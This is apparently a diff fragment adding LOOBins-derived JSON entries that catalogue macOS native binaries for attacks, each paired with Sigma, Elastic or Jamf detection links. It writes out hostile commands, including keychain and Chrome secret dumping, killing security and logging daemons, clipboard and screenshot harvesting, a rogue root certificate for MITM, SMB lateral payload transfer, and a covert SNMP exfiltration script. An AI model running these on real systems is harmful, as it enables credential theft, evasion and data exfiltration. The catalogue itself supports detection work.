>> loot.txt; sleep 10; done", + "description": "A pbpaste bash loop can continuously collect clipboard contents every x minutes and write contents to a file (or another location). This may allow an attacker to gather user credentials or collect other sensitive information.", + "mitre": [], + "fullPath": [ + "/usr/bin/pbpaste" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Clipboard Data Collection Via Pbpaste", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules-threat-hunting/macos/process_creation/proc_creation_macos_pbpaste_execution.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pbpaste.yml", + "https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-b65" + ] + }, + { + "id": "loobins:pkill:1fe342f7502ca679", + "toolId": "loobins:pkill", + "toolName": "pkill", + "name": "Kill security tools", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "pkill -f \"Little Snitch|ESET|osqueryd|Falcon\"", + "description": "Terminate defensive processes like firewalls, AV, or monitoring tools.", + "mitre": [], + "fullPath": [ + "/usr/bin/pkill" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process execution monitoring for pkill", + "value": "Process execution monitoring for pkill" + }, + { + "type": "Endpoint Detection - pkill targeting security tools", + "value": "Endpoint Detection - pkill targeting security tools" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", + "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", + "https://ss64.com/mac/pkill.html" + ] + }, + { + "id": "loobins:pkill:5a5a01fbc83306af", + "toolId": "loobins:pkill", + "toolName": "pkill", + "name": "Force kill processes with SIGKILL", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "pkill -9 osqueryd", + "description": "Use the -9 signal to forcefully terminate processes that may not respond to normal termination signals. Useful for killing hung security tools.", + "mitre": [], + "fullPath": [ + "/usr/bin/pkill" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process execution monitoring for pkill", + "value": "Process execution monitoring for pkill" + }, + { + "type": "Endpoint Detection - pkill targeting security tools", + "value": "Endpoint Detection - pkill targeting security tools" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", + "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", + "https://ss64.com/mac/pkill.html" + ] + }, + { + "id": "loobins:pkill:c051aba20a9aac26", + "toolId": "loobins:pkill", + "toolName": "pkill", + "name": "Kill all processes for a user", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion", + "Impact" + ], + "command": "pkill -u username", + "description": "Terminate all processes belonging to a specific user, potentially ending user sessions or disrupting monitoring.", + "mitre": [], + "fullPath": [ + "/usr/bin/pkill" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process execution monitoring for pkill", + "value": "Process execution monitoring for pkill" + }, + { + "type": "Endpoint Detection - pkill targeting security tools", + "value": "Endpoint Detection - pkill targeting security tools" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", + "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", + "https://ss64.com/mac/pkill.html" + ] + }, + { + "id": "loobins:pkill:3f61e8515e59c3e8", + "toolId": "loobins:pkill", + "toolName": "pkill", + "name": "Kill logging and monitoring daemons", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "pkill -f \"syslog|auditd|osqueryd|esensor|nessusd\"", + "description": "Terminate system logging and monitoring processes to evade detection.", + "mitre": [], + "fullPath": [ + "/usr/bin/pkill" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process execution monitoring for pkill", + "value": "Process execution monitoring for pkill" + }, + { + "type": "Endpoint Detection - pkill targeting security tools", + "value": "Endpoint Detection - pkill targeting security tools" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", + "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", + "https://ss64.com/mac/pkill.html" + ] + }, + { + "id": "loobins:pkill:3b9d034ed0f34b48", + "toolId": "loobins:pkill", + "toolName": "pkill", + "name": "Kill process by exact name match", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion", + "Impact" + ], + "command": "pkill -x com.apple.Safari", + "description": "Use exact matching with -x flag to kill specific process by exact name rather than pattern.", + "mitre": [], + "fullPath": [ + "/usr/bin/pkill" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process execution monitoring for pkill", + "value": "Process execution monitoring for pkill" + }, + { + "type": "Endpoint Detection - pkill targeting security tools", + "value": "Endpoint Detection - pkill targeting security tools" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml", + "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer", + "https://ss64.com/mac/pkill.html" + ] + }, + { + "id": "loobins:plutil:924262c1c30d2ac6", + "toolId": "loobins:plutil", + "toolName": "plutil", + "name": "Set app to run with dock icon hidden", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "plutil -insert LSUIElement -string \"1\" /Applications/TargetApp.app/Contents/Info.plist", + "description": "plutil can be used to set the \"LSUIElement\" attribute to true which will force the targeted app to run without the UI and dock icon.", + "mitre": [], + "fullPath": [ + "/usr/bin/plutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Splunk Security Content: MacOS plutil", + "value": "https://research.splunk.com/endpoint/c11f2b57-92c1-4cd2-b46c-064eafb833ac/" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/plutil.yml", + "https://scriptingosx.com/2016/11/editing-property-lists/", + "https://attack.mitre.org/techniques/T1647/" + ] + }, + { + "id": "loobins:profiles:d0384102b00daeed", + "toolId": "loobins:profiles", + "toolName": "profiles", + "name": "Collect system DEP information.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sudo profiles show -type enrollment", + "description": "The following command determines whether device is DEP(Device Enrolment Program) enabled and output the DEP information.", + "mitre": [], + "fullPath": [ + "/usr/bin/profiles" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing.", + "value": "No detections at time of publishing." + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm" + ] + }, + { + "id": "loobins:profiles:eb38ca70e6c00880", + "toolId": "loobins:profiles", + "toolName": "profiles", + "name": "Remove configuration profiles.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Impact" + ], + "command": "profiles remove -identifier com.profile.identifier -password <password>", + "description": "The following command deletes the specified profiles. An optional password used when removing a configuration profile which requires the password removal option.", + "mitre": [], + "fullPath": [ + "/usr/bin/profiles" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing.", + "value": "No detections at time of publishing." + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm" + ] + }, + { + "id": "loobins:safaridriver:3df2d8c33d88e234", + "toolId": "loobins:safaridriver", + "toolName": "safaridriver", + "name": "Enable safaridriver", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control", + "Exfiltration" + ], + "command": "sudo safaridriver --enable", + "description": "The following command can be used to enable the WebDriver Safari browser API. The command must be run as root or with sudo privileges.", + "mitre": [], + "fullPath": [ + "/System/Cryptexes/App/usr/bin/safaridriver", + "/usr/bin/safaridriver" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/safaridriver.yml", + "https://developer.apple.com/documentation/webkit/about_webdriver_for_safari", + "https://starlabs.sg/blog/2021/04-you-talking-to-me/" + ] + }, + { + "id": "loobins:say:6807eaa8653a2f11", + "toolId": "loobins:say", + "toolName": "say", + "name": "Read sensitive data", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion", + "Collection" + ], + "nativeCategory": [ + "Defense Evasion", + "Collection" + ], + "command": "say -f /home/user/sensitive-files -i > loot.txt;", + "description": "The following command can read and process sensitive files and redirects the output to a file..", + "mitre": [], + "fullPath": [ + "/usr/bin/say" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content available", + "value": "No detection content available" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml", + "https://ss64.com/osx/say.html" + ] + }, + { + "id": "loobins:say:7ef0bb01f0a5efcf", + "toolId": "loobins:say", + "toolName": "say", + "name": "Collect clipboard data", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion", + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Defense Evasion", + "Reconnaissance", + "Discovery", + "Collection" + ], + "command": "osascript -e 'set volume output muted true' ; say $(pbpaste) -i > loot.txt;", + "description": "The command is designed to enhance privacy by muting the system volume,using a less recognizable \"Whisper\" voice with the \"say\" command, processing the copied text in the clipboard, and saving the output to a file named \"loot.txt.\"", + "mitre": [], + "fullPath": [ + "/usr/bin/say" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content available", + "value": "No detection content available" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml", + "https://ss64.com/osx/say.html" + ] + }, + { + "id": "loobins:screencapture:1c0650f3bbaf5b35", + "toolId": "loobins:screencapture", + "toolName": "screencapture", + "name": "Continuously capture screenshots", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection" + ], + "command": "while true; do ts=$(date +\"%Y%m%d-%H%M%S\"); o=\"/tmp/screenshots\"; screencapture -x \"$o/ss-$ts.png\"; sleep 10; done", + "description": "The following command demonstrates how an attacker can use the tool to capture screenshots every 10 seconds. The -x flag prevents snapshot sounds from being played.", + "mitre": [], + "fullPath": [ + "/usr/sbin/screencapture" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Screen Capture - macOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/screencapture.yml", + "https://ss64.com/osx/screencapture.html" + ] + }, + { + "id": "loobins:scutil:8bc671e538a2f395", + "toolId": "loobins:scutil", + "toolName": "scutil", + "name": "DNS configuration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "scutil --dns", + "description": "Get the current DNS configuration of the systems", + "mitre": [], + "fullPath": [ + "/usr/bin/scutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", + "https://macosbin.com/bin/scutil", + "https://ss64.com/osx/scutil.html" + ] + }, + { + "id": "loobins:scutil:66290cdfc7045939", + "toolId": "loobins:scutil", + "toolName": "scutil", + "name": "Proxy configuration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "scutil --proxy", + "description": "Get the current proxy configuration of the systems", + "mitre": [], + "fullPath": [ + "/usr/bin/scutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", + "https://macosbin.com/bin/scutil", + "https://ss64.com/osx/scutil.html" + ] + }, + { + "id": "loobins:scutil:a42e857b47431b0e", + "toolId": "loobins:scutil", + "toolName": "scutil", + "name": "Network reachability", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "scutil -r { nodename | address | local-address remote-address }", + "description": "Check if the destination host is reachable from your Mac", + "mitre": [], + "fullPath": [ + "/usr/bin/scutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", + "https://macosbin.com/bin/scutil", + "https://ss64.com/osx/scutil.html" + ] + }, + { + "id": "loobins:scutil:c8f9a92cde041427", + "toolId": "loobins:scutil", + "toolName": "scutil", + "name": "Hostname, localhost name and computername", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "scutil --get { HostName | LocalHostName | ComputerName }", + "description": "Display the current hostname, localhost name and computername", + "mitre": [], + "fullPath": [ + "/usr/bin/scutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml", + "https://macosbin.com/bin/scutil", + "https://ss64.com/osx/scutil.html" + ] + }, + { + "id": "loobins:security:2eedc72739c333fe", + "toolId": "loobins:security", + "toolName": "security", + "name": "Dump credentials, keys, certificates, and other sensitive information from Keychain", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "sudo security dump-keychain -d login.keychain", + "description": "This command will dump keychain passwords from login.keychain", + "mitre": [], + "fullPath": [ + "/usr/bin/security" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Credentials from Password Stores - Keychain", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + }, + { + "type": "Elastic: Access to Keychain Credentials Directories", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" + }, + { + "type": "Elastic: Credential Access Dumping Keychain Security", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" + }, + { + "type": "Elastic: Keychain Password Retrieval via Command Line", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" + }, + { + "type": "Jamf Protect: Detect Keychain dumping using security", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", + "https://www.netmeister.org/blog/keychain-passwords.html", + "https://ss64.com/osx/security.html" + ] + }, + { + "id": "loobins:security:81de7ed93c807a66", + "toolId": "loobins:security", + "toolName": "security", + "name": "Retrieve Chrome's \"Chrome Safe Storage\" password manager secret", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "security find-generic-password -w -s \"Chrome Safe Storage\"", + "description": "This command will retrieve the Chrome Safe Storage password manager secret from the keychain.", + "mitre": [], + "fullPath": [ + "/usr/bin/security" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Credentials from Password Stores - Keychain", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + }, + { + "type": "Elastic: Access to Keychain Credentials Directories", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" + }, + { + "type": "Elastic: Credential Access Dumping Keychain Security", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" + }, + { + "type": "Elastic: Keychain Password Retrieval via Command Line", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" + }, + { + "type": "Jamf Protect: Detect Keychain dumping using security", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", + "https://www.netmeister.org/blog/keychain-passwords.html", + "https://ss64.com/osx/security.html" + ] + }, + { + "id": "loobins:security:81b1fcfde9e5f88c", + "toolId": "loobins:security", + "toolName": "security", + "name": "Add an arbitrary trusted certificate to aid a MITM attack", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain bad_cert.crt", + "description": "This command will add a certificate to the keychain.", + "mitre": [], + "fullPath": [ + "/usr/bin/security" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Credentials from Password Stores - Keychain", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + }, + { + "type": "Elastic: Access to Keychain Credentials Directories", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml" + }, + { + "type": "Elastic: Credential Access Dumping Keychain Security", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml" + }, + { + "type": "Elastic: Keychain Password Retrieval via Command Line", + "value": "https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml" + }, + { + "type": "Jamf Protect: Detect Keychain dumping using security", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml", + "https://www.netmeister.org/blog/keychain-passwords.html", + "https://ss64.com/osx/security.html" + ] + }, + { + "id": "loobins:sfltool:1a930e98a41d0d09", + "toolId": "loobins:sfltool", + "toolName": "sfltool", + "name": "Display Login Items", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sfltool dumpbtm", + "description": "Identify all current login and background items configured on the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/sfltool" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml", + "https://www.unix.com/man-page/mojave/1/sfltool/", + "https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/" + ] + }, + { + "id": "loobins:sfltool:d845cfd089e6a465", + "toolId": "loobins:sfltool", + "toolName": "sfltool", + "name": "Reset Login Items to Defaults", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "sfltool resetbtm", + "description": "Reset all third-party Login Items and revert to installation defaults.", + "mitre": [], + "fullPath": [ + "/usr/bin/sfltool" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml", + "https://www.unix.com/man-page/mojave/1/sfltool/", + "https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/" + ] + }, + { + "id": "loobins:sharing:a3a779c08185c705", + "toolId": "loobins:sharing", + "toolName": "sharing", + "name": "Create an SMB share on a target over SSH for lateral tool transfer", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "# On target (via SSH): create share directory, start smbd, create the share\nssh user@<TARGET_IP> 'mkdir -p ~/share && sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smbd.plist && sudo sharing -a /Users/user/share -n share -s 001'\n\n# On attacker: mount the share using osascript and transfer a file\nosascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'\ncp payload.sh /Volumes/share/", + "description": "With SSH access to the target, the sharing utility can create an SMB share pointing to a directory on the target. Combined with the macOS smbd LaunchDaemon, the share becomes accessible over the network. The attacker can then mount the share using osascript and copy files directly into it, which appear immediately in the target's share directory. The -s 001 flag enables SMB access on the share.", + "mitre": [], + "fullPath": [ + "/usr/sbin/sharing" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sharing.yml", + "https://ss64.com/mac/sharing.html", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:snmptrap:d22536ed519866e6", + "toolId": "loobins:snmptrap", + "toolName": "snmptrap", + "name": "Covert file transfer via SNMP trap payloads", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement", + "Exfiltration", + "Command and Control" + ], + "command": "# On receiver: install trap handler script\nsudo tee /usr/local/bin/trap_handler.sh > /dev/null << 'EOF'\n#!/bin/bash\nTRANSFER_DIR=\"/tmp/snmp_transfers\"\nSTATE_FILE=\"/tmp/snmp_transfer_state\"\nmkdir -p \"$TRANSFER_DIR\"\nwhile read line; do\n if echo \"$line\" | grep -q \"SNMPv2-SMI::enterprises.99999.1\"; then\n DATA=$(echo \"$line\" | sed 's/.*\"\\(.*\\)\"/\\1/')\n if [[ \"$DATA\" == FILENAME:* ]]; then\n FILENAME=\"${DATA#FILENAME:}\"\n echo \"$FILENAME\" > \"$STATE_FILE\"\n > \"${TRANSFER_DIR}/${FILENAME}.b64\"\n elif [[ \"$DATA\" == DATA:* ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n CHUNK=\"${DATA#DATA:}\"\n echo -n \"$CHUNK\" >> \"${TRANSFER_DIR}/${FILENAME}.b64\"\n fi\n elif [[ \"$DATA\" == \"END\" ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n base64 -D < \"${TRANSFER_DIR}/${FILENAME}.b64\" > \"${TRANSFER_DIR}/${FILENAME}\"\n echo \"MD5: $(md5 -q \"${TRANSFER_DIR}/${FILENAME}\")\"\n rm \"${TRANSFER_DIR}/${FILENAME}.b64\"\n rm \"$STATE_FILE\"\n fi\n fi\n fi\ndone\nEOF\nsudo chmod +x /usr/local/bin/trap_handler.sh\n\n# On receiver: configure snmptrapd to route traps to the handler and start it\nsudo tee /etc/snmp/snmptrapd.conf > /dev/null << 'EOF'\ndisableAuthorization yes\ntraphandle default /usr/local/bin/trap_handler.sh\nEOF\nsudo snmptrapd -f -Lo\n\n# On sender: transmit file in chunks\nFILE_PATH=\"/tmp/payload.sh\"\nRECEIVER_IP=\"<RECEIVER_IP>\"\nCHUNK_SIZE=1000\nBASE64_DATA=$(base64 < \"$FILE_PATH\")\nFILE_NAME=$(basename \"$FILE_PATH\")\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"FILENAME:$FILE_NAME\"\necho \"$BASE64_DATA\" | fold -w $CHUNK_SIZE | while read chunk; do\n snmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"DATA:$chunk\"\n sleep 0.1\ndone\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"END\"", + "description": "This technique assumes both the sender and receiver are macOS hosts. Files are base64-encoded and sent as a sequence of SNMP traps carrying chunked data under a custom OID (1.3.6.1.4.1.99999). Three message types are used - FILENAME signals the start of a transfer, DATA carries each base64 chunk, and END triggers reassembly. snmptrapd on the receiver routes all traps to a handler script that writes, reassembles, and decodes the chunks using macOS-native base64 and md5 utilities. The resulting file is verified with an MD5 hash.", + "mitre": [], + "fullPath": [ + 